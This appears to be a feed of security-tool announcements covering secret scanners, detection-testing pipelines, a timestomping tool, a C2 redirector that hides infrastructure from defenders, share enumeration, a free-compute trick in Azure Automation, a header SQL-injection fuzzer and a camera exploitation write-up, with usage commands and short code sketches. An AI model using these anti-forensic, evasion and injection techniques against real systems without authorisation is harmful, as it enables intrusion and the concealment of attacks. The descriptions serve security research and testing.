Scans for over 80 unique RegEx signatures that can help in uncovering secret exposures, tagged with their severity, from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
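As a rough sketch of how signature-based secret scanning works (a Python illustration only; BucketLoot is written in Go and the exact regexes.json format is not reproduced here):

# Sketch of RegEx-signature scanning; signature names/patterns are illustrative.
import re

SIGNATURES = {
    "AWS Access Key ID": (r"AKIA[0-9A-Z]{16}", "high"),
    "Slack webhook": (r"https://hooks\.slack\.com/services/[A-Za-z0-9/_-]+", "medium"),
}

def scan(text: str) -> None:
    for name, (pattern, severity) in SIGNATURES.items():
        for match in re.finditer(pattern, text):
            print(f"[{severity}] {name}: {match.group(0)}")

scan("leaked: AKIA1234567890ABCDEF and https://hooks.slack.com/services/T000/B000/XXXX")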

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique RegEx signatures in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from the response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R
30 January 2024 at 11:30


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project, which allows simulating attacks following MITRE TTPs (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently only the Atomics from the public repository are supported. The pipeline takes a Technique ID, or a comma-separated list of techniques, as input, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
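If you prefer to pull those logs programmatically rather than through the portal, a sketch along these lines should work with the azure-monitor-query package (the workspace ID and the timespan are placeholders):

# Sketch: read recent AtomicLogs_CL rows with the azure-monitor-query SDK.
# <log-analytics-workspace-id> is a placeholder for your workspace ID.
from datetime import timedelta
from azure.identity import DefaultAzureCredential
from azure.monitor.query import LogsQueryClient

client = LogsQueryClient(DefaultAzureCredential())
response = client.query_workspace(
    "<log-analytics-workspace-id>",
    "AtomicLogs_CL | sort by TimeGenerated desc | take 20",
    timespan=timedelta(days=1),
)
for table in response.tables:
    for row in table.rows:
        print(row)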

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment risks contaminating the environment and making the simulations less stable and predictable.

TODO

Must have

  • Check if pre-reqs have been fulfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs techniques sequentially with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configurable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations

Issues

  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR

References



Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R
31 January 2024 at 11:30


A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
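The ports linked above are the real implementations; purely as a minimal illustration of the underlying idea (flattening modified and access times with os.utime; creation time needs platform-specific APIs and is omitted), a Python sketch could look like this:

# Minimal timestomping sketch: flatten modified/access times to a single timestamp.
# Creation time is not handled here; on Windows that requires e.g. pywin32's SetFileTime.
import os
from datetime import datetime
from pathlib import Path

def stomp(path: str, new_time: datetime, recurse: bool = False) -> None:
    ts = new_time.timestamp()
    targets = Path(path).rglob("*") if recurse else [Path(path)]
    for target in targets:
        if target.is_file():
            os.utime(target, (ts, ts))  # (atime, mtime)

stomp(r"C:\path\to\file.txt", datetime(2023, 1, 1, 0, 0, 0))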

Usage

  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  2. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
  3. Use specific credentials:

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R
1 February 2024 at 11:30


Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


SAP Router

SAP Routers can either support SNC or not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out if it is activated:

sncscan -H 10.3.161.4 -S 3299 -p router

DIAG / SAP GUI

The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact the connection's security is in the section Background.

sncscan -H 10.3.161.3 -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

Through SAP Router

sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

Install

Requirements: Currently, sncscan only works with the pysap library from our fork.

python3 -m pip install -r requirements.txt

or

python3 setup.py test
python3 setup.py install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection that can be applied to an SNC-secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: Minimum security level required for SNC connections.
  • snc/data_protection/max: Highest security level, initiated by the SAP system.
  • snc/data_protection/use: Default security level, initiated by the SAP system.

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as the addressed SAP system is capable of sending SNC messages, it responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R
2 February 2024 at 11:30

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances


Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destroy data, and extort money via ransom. For example, one of the most significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments
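As a loose sketch of the kind of check the ransomware modules perform (this is not MELEE's code; the host, credentials and ransom-note naming heuristic below are assumptions), a few lines of Python with PyMySQL look like this:

# Sketch: connect to a MySQL instance and flag database names that look like ransom notes.
# Host/credentials are placeholders; the name patterns are a common heuristic only.
import re
import pymysql

RANSOM_PATTERN = re.compile(r"(PLEASE_READ|README|RECOVER|RANSOM)", re.IGNORECASE)

conn = pymysql.connect(host="192.0.2.10", user="root", password="", connect_timeout=5)
try:
    with conn.cursor() as cur:
        cur.execute("SHOW DATABASES")
        for (db_name,) in cur.fetchall():
            if RANSOM_PATTERN.search(db_name):
                print(f"[!] possible ransomware artifact: database '{db_name}'")
finally:
    conn.close()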

Tool Usage

Researched and Developed By Aditya K Sood and Rohit Bansal

Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R
3 February 2024 at 11:30


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name | Publication Date | Link
Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R
4 February 2024 at 11:30

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - secureci.org for more information.


Features

  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

Usage

This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

Parameters:

  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

Example:

To use this script to interact with a GitHub repo, you might run a command like the following:

python argus.py --mode repo --url https://github.com/username/repo.git --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker.io docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

Troubleshooting

If there is an issue with needing Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note: we do not store this information anywhere, nor create anything in the Github account; we only use this for cloning the repositories.

Contributions

Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

  @inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
year={2023},
}


Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R
5 February 2024 at 11:30


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):

Heuristics

navgix will make an initial GET request to the page, and if there are any directories referenced in the page HTML (specified in src attributes on HTML components), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
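A stripped-down Python version of that heuristic might look like the sketch below (navgix itself is written in Go; the probe and the "anything but 404 is suspicious" check are simplifications, not navgix's exact confirmation logic):

# Sketch: collect directories from src attributes, then probe each with an
# off-by-slash path (/static../), the classic nginx alias traversal pattern.
import re
from urllib.parse import urljoin
import requests

def candidate_dirs(base_url):
    html = requests.get(base_url, timeout=10).text
    dirs = set()
    for src in re.findall(r'src=["\']([^"\']+)["\']', html):
        parts = src.lstrip("/").split("/")[:-1]        # drop the file name
        for i in range(1, len(parts) + 1):
            dirs.add("/" + "/".join(parts[:i]) + "/")  # /static/, /static/img/, ...
    return dirs

def probe(base_url, directory):
    traversal = urljoin(base_url, directory.rstrip("/") + "../")  # e.g. /static../
    status = requests.get(traversal, timeout=10).status_code
    if status != 404:
        print(f"[?] {traversal} returned {status} - possible alias traversal")

base = "http://target.example/"
for d in candidate_dirs(base):
    probe(base, d)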

Brute-force

navgix will also test a short list of directories that commonly have this vulnerability; if any of these directories exist, it will attempt to confirm whether a vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R
6 February 2024 at 11:30


Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain


Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
default: SYSVOL,NETLOGON,IPC$,PRINT$
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or separately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.
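For context, the sort of LDAP query implied by a filter such as /ldap:servers can be sketched with Python's ldap3 library (SharpShares itself is C#; the domain controller, credentials and the operatingSystem-based filter below are assumptions for illustration):

# Sketch: enumerate enabled server computer objects over LDAP with ldap3.
from ldap3 import Server, Connection, NTLM, SUBTREE

server = Server("dc01.example.local")
conn = Connection(server, user="EXAMPLE\\operator", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)

# enabled computers whose operatingSystem looks like a server edition
ldap_filter = ("(&(objectCategory=computer)(operatingSystem=*server*)"
               "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))")
conn.search("DC=example,DC=local", ldap_filter, search_scope=SUBTREE,
            attributes=["dNSHostName"])
for entry in conn.entries:
    print(entry.dNSHostName)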



BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R
7 February 2024 at 11:30


BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit project's wiki.


Features

  • Highly configurable and customizable filter pipeline with boolean-based concatenation of rules, able to hide your infrastructure from the keenest blue eyes.
  • Easily extendable project structure, everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors, combined with an IP filter to prevent them from using/attacking your infrastructure.
  • Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
  • Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of a request against IP Geolocation/reverse lookup data and compare it to specified regular expressions, to exclude peers connecting from outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
  • Support for multiple proxies with different filter pipelines at one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.

Rules

BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators

Rules configuration page may be found here.
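To make the boolean-based combination idea concrete, here is a tiny illustration in Python (BounceBack's actual rules are Go types registered through RuleBaseCreator/RuleWrapperCreator; the rule names below are invented):

# Illustration: each rule is a predicate over a request, and and/not
# combinators compose them into a filter pipeline.
def ip_blacklisted(req): return req["ip"].startswith("198.51.100.")
def has_c2_cookie(req): return "session" in req.get("cookies", {})
def work_hours(req): return 9 <= req["hour"] < 18

def all_of(*rules): return lambda req: all(r(req) for r in rules)
def negate(rule): return lambda req: not rule(req)

# allow only requests with the implant cookie, outside vendor IP space, during work hours
allow = all_of(has_c2_cookie, negate(ip_blacklisted), work_hours)

print(allow({"ip": "203.0.113.7", "cookies": {"session": "x"}, "hour": 14}))   # True
print(allow({"ip": "198.51.100.9", "cookies": {"session": "x"}, "hour": 14}))  # False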

Proxies

At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added, just register your new type in manager. Example proxy implementations may be found here.

Proxies configuration page may be found here.

Installation

Just download the latest release from the release page, unzip it, edit the config file and go on.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot


SADProtocol goes to Hollywood

By: Zion3R
8 February 2024 at 11:30

Faraday’s researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and found two high-severity vulnerabilities.


This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, he opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.


They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:


Product Model Affected Versions
CS-C6N-B0-1G2WF Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR Versions below V5.2.3 build 230217
EZVIZ LC1C Versions below V5.3.4 build 230214


These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:



Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A detailed deep dive into the whole research process can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, and developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in-memory code patching and manipulating the execution of the binary that implements most of the camera features.



This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R
9 February 2024 at 11:30


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23, which decided not to change the service behavior as it's considered "by design". As of 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage

Python

Powershell

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R
10 February 2024 at 11:30


SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives through response-time analysis and to send alerts upon detection via the built-in Discord notification functionality.


Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

Installation

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

Usage

This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h


[SqliSniper ASCII art banner]

-: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]

Detect SQL injection by sending malicious queries

options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads

Running SqliSniper

Single Url Scan

The URL can be provided with the -u flag for a single-site scan.

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

piping URLs

SqliSniper can also work with pipeline input using the -p flag.

cat url.txt | ./sqlisniper.py -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default, SqliSniper uses the payloads.txt file. However, the --payload flag can be used to provide a custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using a custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this:

ubuntu:~/sqlisniper$ cat payloads.txt 
